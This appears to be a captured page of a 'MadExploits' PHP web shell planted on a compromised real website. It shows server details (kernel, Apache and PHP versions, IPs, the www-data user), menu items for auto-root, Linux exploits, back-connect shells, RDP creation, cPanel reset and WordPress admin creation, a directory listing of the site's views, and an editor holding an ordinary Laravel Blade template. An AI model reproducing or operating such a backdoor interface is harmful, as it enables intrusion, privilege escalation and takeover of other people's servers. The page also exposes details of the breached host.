Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.83
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahresources.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
9.98
KB
-rw-r--r--
blogs.blade.php
4.31
KB
-rw-r--r--
contact_us.blade.php
9.56
KB
-rw-r--r--
index.blade.php
31.64
KB
-rw-r--r--
index_old.blade.php
940
B
-rw-r--r--
portfolio.blade.php
14.99
KB
-rw-r--r--
post.blade.php
6.25
KB
-rw-r--r--
practice_area.blade.php
2.1
KB
-rw-r--r--
privacy_security.blade.php
1.62
KB
-rw-r--r--
projects.blade.php
1.68
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
7.23
KB
-rw-r--r--
services.blade.php
2.09
KB
-rw-r--r--
sitemap.blade.php
4.12
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
2.6
KB
-rw-r--r--
thank_you.blade.php
1.07
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : post.blade.php
@extends('layouts.app') @section('contents') <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['MSCLKID'])){ $MSCLKID=$_GET['MSCLKID']; }else{ $MSCLKID=''; } ?> <!-- Page Title --> <section class="page-title centred" style="background-image: url({{'../assets/images/background/page-title.jpg'}});"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h1>Blog Post</h1> </div> </div> </div> </section> <!-- End Page Title --> <!-- sidebar-page-container --> <section class="sidebar-page-container"> <div class="auto-container"> <div class="row clearfix"> <div class="col-lg-8 col-md-12 col-sm-12 content-side"> <div class="blog-details-content"> <div class="news-block-one"> <div class="inner-box"> <figure class="image-box"> <img src="{{'../assets/blog-posts/'.$post->featured_image}}" alt="{{$post->featured_alt}}" style="height: 26rem"> <div class="post-date"> <h4>31</h4> <p>AUG</p> </div> </figure> <div class="lower-content"> <ul class="post-info clearfix"> <li><i class="far fa-folder-open"></i>Human Resource</li> <li><i class="far fa-comments"></i><a href="">02 Comments</a></li> </ul> <h2>{{$post->post_title}}</h2> <div class="text"> <p>{!! strip_tags($post->post_detail) !!}</p> </div> <div class="post-share-option clearfix"> <ul class="post-tags pull-left clearfix"> <li><h4>Tags</h4></li> <li><a href="">Recruitment</a></li> <li><a href="">Stuffing</a></li> </ul> <ul class="social-links pull-right clearfix"> <li><a href="{{$social_links->facebook}}"><i class="fab fa-facebook-square"></i></a></li> <li><a href="{{$social_links->twitter}}"><i class="fab fa-twitter"></i></a></li> <li><a href="{{$social_links->pinterest}}"><i class="fab fa-pinterest-p"></i></a></li> <li><a href="{{$social_links->instagram}}"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> </div> </div> <div class="col-lg-4 col-md-12 col-sm-12 sidebar-side"> <div class="blog-sidebar"> <div class="sidebar-search"> <form class="search-form"> <div class="form-group"> <input type="search" name="search-field" placeholder="Search" required=""> <button type="button"><i class="flaticon-magnifying-glass"></i></button> </div> </form> </div> <div class="sidebar-widget sidebar-post"> <div class="widget-title"> <h4>Recent Blogs</h4> </div> <div class="post-inner"> @foreach($latest_blogs as $latest_blog) <div class="post"> <figure class="post-thumb"><a href="{{url('blog/'.$latest_blog->slug)}}"> <img src="{{'../assets/blog-posts/'.$latest_blog->featured_image}}" alt="{{$latest_blog->featured_alt}}"> </a></figure> @php $created_at = \Carbon\Carbon::parse($latest_blog->created_at); $date = $created_at->format('d'); $month = $created_at->format('M'); $year = $created_at->format('y'); @endphp <span class="post-date">{{$date.' '.$month.', 20'.$year}}</span> <h6><a href="{{url('blog/'.$latest_blog->slug)}}">{!! Str::limit( strip_tags($latest_blog->post_title), 30, ' ...') !!}</a></h6> </div> @endforeach </div> </div> <div class="sidebar-widget category-widget"> <div class="widget-title"> <h4>Services</h4> </div> <div class="widget-content"> <ul class="category-list clearfix"> @foreach($services as $service) <li><a href="{{url($service->slug)}}">{{$service->title}}</a></li> @endforeach </ul> </div> </div> </div> </div> </div> </div> </section> <!-- sidebar-page-container end --> @endsection
Close